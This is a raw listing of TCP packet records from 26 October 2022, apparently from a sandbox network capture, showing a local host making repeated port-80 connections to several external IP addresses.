Oct 26, 2022 13:19:40.238814116 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.238841057 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.238858938 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.238995075 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.239139080 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:40.239304066 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:40.395160913 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.395224094 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.395265102 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.395303011 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.395355940 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:40.395467043 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:40.395525932 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:40.395596027 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.395653009 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.395800114 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.395910025 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.395908117 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:40.396013975 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.396756887 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.396814108 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.397736073 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.552103996 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.552237988 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.552357912 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.552608013 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.552787066 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.661492109 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.661524057 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.661722898 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:41.095201969 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:42.111135960 CEST	49918	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:42.267908096 CEST	80	49918	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:42.268188953 CEST	49918	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:42.268295050 CEST	49918	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:42.424601078 CEST	80	49918	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:42.518376112 CEST	80	49918	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:42.518452883 CEST	80	49918	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:42.518874884 CEST	49918	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:42.518994093 CEST	49918	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:42.675647974 CEST	80	49918	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:47.543229103 CEST	49919	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:47.695904016 CEST	80	49919	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:47.696135044 CEST	49919	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:47.696310043 CEST	49919	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:47.848839998 CEST	80	49919	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:47.859009027 CEST	80	49919	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:47.859085083 CEST	80	49919	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:47.859481096 CEST	49919	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:48.703000069 CEST	49919	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:49.718647003 CEST	49920	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:49.871490002 CEST	80	49920	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:49.871809959 CEST	49920	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:49.871920109 CEST	49920	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:50.024492979 CEST	80	49920	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:50.034704924 CEST	80	49920	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:50.034797907 CEST	80	49920	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:50.034971952 CEST	49920	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:50.874519110 CEST	49920	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:51.890109062 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.042974949 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.043294907 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.043828964 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.043951988 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.196557045 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.196616888 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.196657896 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.196696997 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.196779966 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.196943998 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.196948051 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.197005033 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.197118044 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.197163105 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.197206020 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.197243929 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.197297096 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.197351933 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.197464943 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.197643995 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.349565029 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.349613905 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.349644899 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.349673033 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.349772930 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.349946976 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.349951982 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.349988937 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.350109100 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.350116968 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.350286007 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:52.350677013 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.350717068 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.350744963 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.502731085 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.502789021 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.502827883 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.503056049 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.503112078 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.505446911 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.505510092 CEST	80	49921	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:52.505733967 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:53.045835018 CEST	49921	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:54.061434031 CEST	49922	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:54.214447975 CEST	80	49922	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:54.214677095 CEST	49922	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:54.214807987 CEST	49922	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:54.367858887 CEST	80	49922	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:54.384260893 CEST	80	49922	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:54.384434938 CEST	80	49922	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:54.384665966 CEST	49922	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:54.384784937 CEST	49922	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:19:54.537880898 CEST	80	49922	162.241.217.234	192.168.11.20
Oct 26, 2022 13:19:59.389004946 CEST	49923	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:19:59.572856903 CEST	80	49923	104.140.149.212	192.168.11.20
Oct 26, 2022 13:19:59.573086977 CEST	49923	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:19:59.573220015 CEST	49923	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:19:59.756920099 CEST	80	49923	104.140.149.212	192.168.11.20
Oct 26, 2022 13:19:59.772875071 CEST	80	49923	104.140.149.212	192.168.11.20
Oct 26, 2022 13:19:59.772937059 CEST	80	49923	104.140.149.212	192.168.11.20
Oct 26, 2022 13:19:59.773082018 CEST	49923	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:00.575397015 CEST	49923	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:01.591268063 CEST	49924	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:01.776793957 CEST	80	49924	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:01.777021885 CEST	49924	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:01.777151108 CEST	49924	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:01.962762117 CEST	80	49924	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:01.975059986 CEST	80	49924	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:01.975156069 CEST	80	49924	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:01.975573063 CEST	49924	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:02.778083086 CEST	49924	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:03.793872118 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:03.982158899 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:03.982454062 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:03.983027935 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:03.983100891 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:03.983153105 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:04.171158075 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.171253920 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.171350956 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.171386003 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:04.171403885 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.171456099 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.171514988 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.171571016 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.171744108 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:04.171906948 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:04.171907902 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:04.211553097 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.212227106 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:04.359692097 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.359782934 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.359857082 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.359899998 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.359961987 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.360004902 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:04.360011101 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.360130072 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:04.360449076 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.360538960 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.360586882 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.360810995 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.400640965 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.548273087 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.548437119 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.548506975 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.548549891 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.548724890 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.548892975 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.549015045 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.549315929 CEST	80	49925	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:04.996407032 CEST	49925	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:06.011810064 CEST	49926	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:06.198607922 CEST	80	49926	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:06.198930979 CEST	49926	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:06.198930979 CEST	49926	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:06.385761023 CEST	80	49926	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:06.401736975 CEST	80	49926	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:06.401803017 CEST	80	49926	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:06.402260065 CEST	49926	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:06.402393103 CEST	49926	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:20:06.588819981 CEST	80	49926	104.140.149.212	192.168.11.20
Oct 26, 2022 13:20:11.417435884 CEST	49927	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:11.767842054 CEST	80	49927	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:11.768048048 CEST	49927	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:11.768132925 CEST	49927	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:12.126378059 CEST	80	49927	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:12.126710892 CEST	49927	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:12.775952101 CEST	49927	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:13.791546106 CEST	49928	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:14.057528973 CEST	80	49928	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:14.058363914 CEST	49928	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:14.058480024 CEST	49928	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:14.333565950 CEST	80	49928	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:14.333765030 CEST	49928	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:15.072302103 CEST	49928	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:16.087878942 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:16.437877893 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:16.438144922 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:16.439145088 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:16.439241886 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:16.789262056 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:16.789283037 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:16.789494038 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:16.789556980 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:16.789729118 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:16.789791107 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:16.789896965 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:16.790060043 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:17.140657902 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:17.140719891 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:17.140759945 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:17.140798092 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:17.140839100 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:17.140885115 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:17.140991926 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:17.446672916 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:17.491276979 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:17.491313934 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:17.491389990 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:17.510807037 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:17.511017084 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:17.796664953 CEST	80	49929	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:17.796792030 CEST	49929	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:18.462301970 CEST	49930	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:18.729701042 CEST	80	49930	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:18.730043888 CEST	49930	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:18.730043888 CEST	49930	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:19.002845049 CEST	80	49930	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:19.003226995 CEST	49930	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:19.003381968 CEST	49930	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:20:19.270548105 CEST	80	49930	103.20.200.97	192.168.11.20
Oct 26, 2022 13:20:24.007965088 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.028001070 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.028242111 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.028343916 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.087110996 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.929711103 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.929799080 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.929862022 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.929917097 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.929975986 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.930035114 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.930095911 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.930114031 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.930114031 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.930156946 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.930242062 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.930454969 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.949328899 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.949407101 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.949704885 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.950068951 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.950153112 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.950222015 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.950288057 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.950350046 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.950400114 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.950473070 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.950473070 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.950594902 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.954114914 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.954193115 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.954256058 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.954302073 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.954361916 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.954406977 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.954468012 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.954505920 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.954507113 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.954528093 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.954590082 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.954591990 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.954642057 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.954709053 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.954768896 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.971396923 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.971421003 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.971580029 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.971607924 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.971630096 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.971651077 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.971667051 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.971726894 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.971744061 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.971760035 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.971764088 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.971785069 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.971929073 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.972129107 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.972193956 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.972323895 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.972340107 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.972482920 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.972502947 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.972697020 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.972697020 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.972889900 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.974229097 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.974251986 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.974298000 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.974317074 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.974334955 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.974351883 CEST	80	49931	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:24.974514961 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.974514961 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:24.974514961 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:25.038755894 CEST	49931	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.054548025 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.074912071 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.075154066 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.075366974 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.135133028 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.955271959 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.955297947 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.955317020 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.955336094 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.955354929 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.955374002 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.955390930 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.955410004 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.955425024 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.955569029 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.955730915 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.966674089 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.966895103 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.975658894 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.975723028 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.975774050 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.975821018 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.975869894 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.975917101 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.975929976 CEST	49932	80	192.168.11.20	51.91.236.193
